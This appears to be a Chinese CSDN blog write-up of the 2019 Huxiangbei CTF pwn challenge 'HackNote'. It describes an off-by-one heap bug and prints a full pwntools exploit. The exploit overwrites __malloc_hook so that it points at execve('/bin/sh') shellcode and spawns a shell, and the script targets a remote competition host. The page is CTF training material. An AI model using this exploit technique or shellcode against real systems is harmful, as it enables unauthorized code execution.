2019 湖湘杯 HackNote 经验总结

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量964 收藏 3
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/103006085
版权

静态链接的题目, 又学到了一点

程序保护:
在这里插入图片描述
保护全关

程序逻辑分析:
在这里插入图片描述
常规操作齐了

漏洞点:
在这里插入图片描述
漏洞点发生在edit 函数中, 在对chunk进行edit 完之后, 会对chunk的size进行重新赋值, 而在调试的时候发现, 如果使用原来的chunk的size填满data区, 在进行重新赋值的时候chunk的size比原来的size多了4, 具体调试的时候发现, sub_424660函数应该是strlen函数, 字符串结尾在下一个chunk的size中, 导致重新赋值的size比原来的大, 这就造成了off-by-one漏洞

漏洞利用:
由于本题是静态链接, 库函数的地址都能在文件中找到, 也就是能直接找到malloc_hook或free_hook 的地址, 不用泄露
那么怎么找?

在调用free或malloc函数时会先对__free_hook 或 __malloc_hook 进行检查, 为空则调用free或malloc函数, 不为空则跳转到__free_hook 或__malloc_hook 中的地址上

在这里插入图片描述
在这里插入图片描述
进入free, malloc函数可以找到free_hook与malloc_hook的地址
__free_hook: 0x6CD5E8
__malloc_hook: 0x6CB788

找到_free_hook , _malloc_hook 的地址后就是填入能够getshell的地址, 可以往_malloc_hook 后填入shellcode, _malloc_hook中填入_malloc_hook + 8这样就可以通过利用shellcode来getshell

具体步骤:
利用off-by-one漏洞修改chunk的size, 将chunk分配到_malloc_hook 附近的fake chunk, 之后就是覆盖_malloc_hook 与植入shellcode了

EXP:

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
debug = 0
d = 0

if debug == 0:
	p = process("./HackNote")
	if d == 1:
		context.terminal = ['tmux', 'splitw', '-h']
		gdb.attach(p)
else:
	p = remote("183.129.189.62", 11504)

def add(size, note):
	p.sendlineafter("-----------------", str(1))
	p.sendlineafter("Input the Size:", str(size))
	p.sendafter("Input the Note:", note)

def free(idx):
	p.sendlineafter("-----------------", str(2))
	p.sendlineafter("Input the Index of Note:", str(idx))
	
def edit(idx, note):
	p.sendlineafter("-----------------", str(3))
	p.sendlineafter("Input the Index of Note:", str(idx))
	p.sendlineafter("Input the Note:", note)

elf = ELF("./HackNote")
libc = ELF("/home/user/welpwn/PwnContext/libs/libc-2.23/64bit/libc.so.6")

free_hook = 0x6cd5e8
malloc_hook = 0x6cb788

add(0x18, 'a'*0x18)

add(0x18, 'b'*0x18)

add(0x38, 'd'*0x38)

add(0x18, 'e'*0x18)

add(0x18, 'f'*0x18)

edit(0, 'a'*0x18)

edit(0, 'a'*0x18 + p8(0x81))

free(2)

free(1)

add(0x78, 'b'*0x18 + p64(0x41) + p64(malloc_hook - 0x16) + '\n')

add(0x38, 'h'*0x38)

shellcode = '\x48\x31\xc0\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xd2\x48\x31\xf6\xb0\x3b\x0f\x05'
add(0x38, 'i'*0x6 + p64(malloc_hook + 8) + shellcode + '\n')

p.sendlineafter("-----------------", str(1))
p.sendlineafter("Input the Size:", str(1))

p.interactive()

结果:
在这里插入图片描述

苍崎青子
关注
专栏目录
hacknote.zip
12-30
本题目是攻防世界一道6分的堆漏洞题目,在ctf wiki上面有比较详细的解析和漏洞利用,几乎一模一样,但区别是这道题没有后门函数,所以漏洞利用的方式发生了变化,推荐大家动手分析。
(BUUCTF)huxiangbei_2019_hacknote
xy1458214551的博客
11-30 97
buuctf的huxiangbei_2019_hacknote
【静态编译+off by one】huxiangbei_2019_hacknote
huzai9527的博客
04-12 391
【静态编译+off by one】huxiangbei_2019_hacknote 1.ida分析 通过string,找到add函数,然后找到malloc函数 找到 malloc_hook的地址 寻找堆的漏洞 2.思路 申请四个chunk0,1,2,3 大小分别为,0x18,0x30,0x60,0x30 通过off by one 修改 chunk1 的size 位0xb1 (0x30+0x60+0x10+0x10) free(2) free(1) add(0xa0
CTF misc图片类总结(深育brige、西湖论剑YUSA的小秘密、湖湘leaker、wear_a_mask)
Hardworking666的博客
11-24 6241
文章目录一、zlib_rar+exif+分析像素_zip二、YCrCb通道隐写2021“西湖论剑“网络安全大赛YUSA的小秘密2020ByteCTF Hardcore Watermark 01 一、zlib_rar+exif+分析像素_zip 第一届深育misc,brige.png 使用binwalk分析出有zlib数据,但是无法使用binwalk -e或foremost分离出有效文件,在010editor中查看图片。 (1)运行命令 pngcheck.exe -v xx.png,可以详细查看每个数..
BUUCTF-PWN刷题记录-13(静态编译+去除调试符号)
weixin_44145820的博客
04-27 1427
目录[中关村2019]one_string(unlink) [中关村2019]one_string(unlink) 看这个保护,我以为很简单,然而··· 这题去除了所有符号,并且是静态编译,所以第一步就是把主要函数找出来,如下 在edit函数中,程序会重新计算content的长度,这个时候如果利用了chunk复用,下一个chunk的size也会被计算进长度,这样下次编辑的时候就能覆盖si...
CTF 湖湘 决赛 2021 final.zip
12-07
总的来说,2021年湖湘CTF决赛的挑战涵盖了多样化的网络安全议题,参赛者需要具备广泛的技术知识和实践经验,才能在竞争激烈的决赛中脱颖而出。每个子文件都是一次技术的磨砺,一次思维的碰撞,也是向网络安全更高...
第七届“湖湘”网络安全技能大赛 初赛 zip
12-07
第七届“湖湘”网络安全技能大赛 初赛
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
2017湖湘pwn200
12-02
【标题】"2017湖湘pwn200"是一个网络安全竞赛中的挑战项目,专注于Pwn(破解)类别。在这个挑战中,参赛者需要利用编程和安全漏洞的知识来解决问题,通常涉及缓冲区溢出、格式字符串漏洞、堆溢出等攻击技术。这个...
2020年第六届“湖湘”网络安全技能大赛洞庭决赛第一场-理论答题赛
11-11
第六届“湖湘”网络安全技能大赛洞庭决赛第一场-理论答题赛200道原题,答题的时候保存的,跟大家分享一下,希望有需要的小伙伴可以自行学习一下。
buuoj Pwn writeup 191-195
yongbaoii的博客
06-12 550
191 huxiangbei_2019_hacknote 192 pwnable_simple_login 193 mrctf2020_spfa 194 360chunqiu2017_smallest 195 watevr_2019_voting_machine_1
PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 434
回顾经典老题。一、
[BUUCTF]-PWN:pwnable_hacknote解析
最新发布
2301_79326813的博客
01-29 345
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
攻防世界PWNHacknote题解
seaaseesa的博客
11-09 1457
Hacknote 首先,查看程序的保护机制 然后拖入IDA分析 这是创建堆,并写入信息。 经过分析,大概是这样的 typedefstructNote{ void*func;//函数指针 char*buf;//内容指针 }Note; //保存Node的指针数组 Note*notes[5]; int...
pwn学习——UseAfterFree hacknote
MrTreebook的博客
11-28 268
pwn学习——UseAfterFree hacknote1. 反编译看一下源代码2.add_note3.print_note4.del_note5.exp6.运行结果 1. 反编译看一下源代码 可以看到大概有四个功能 add del print menu 另外还有后门函数magic 2.add_note 可以看到在添加note的时候,每一个note有两个部分 第一个部份是一个put函数 第二个部分存放的是real_content 一个note节点内部结构是这样的 3.print_note 调用pu
huxiangbei_2019_namesystem
seaaseesa的博客
04-30 546
huxiangbei_2019_namesystem 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 在delete功能里,如果当v1为18的时候,19处的指针就不会被覆盖,此后18和19指向的是同一个堆,因此存在double free漏洞。 #coding:utf8 from pwn import * #sh = process('./huxiangbei_2019...
pwn hacknote学习(UAF漏洞利用)
fanghuapyk的博客
12-01 2848
hacknote: uaf漏洞通常就是内存块被释放后,其对应的指针没有被置为NULL,然后在下一次使用前,有相应的代码对这块内存进行了修改,当程序再次使用相同的内存空间的时候,我们就能覆盖原来的地址,从而返回我们想要执行的函数的地址。 我们通常称释放后没有被置为NULL 指针为dangling pointer。 这里贴出源码: #include <stdio.h> #include &...
2017湖湘pwn100的wp
一个码农的笔记
11-30 2730
湖湘pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 629
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
第十七届振兴全国青年编程大赛理论题库详解
第十七届“振兴”全国青年职业技能大赛中的计算机程序设计员赛项理论参考题库包含了针对这一专业技能比赛的理论知识考察内容。题库涵盖了多个知识点,旨在测试参赛者的计算机基础知识、网络技术、虚拟化技术、操作...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值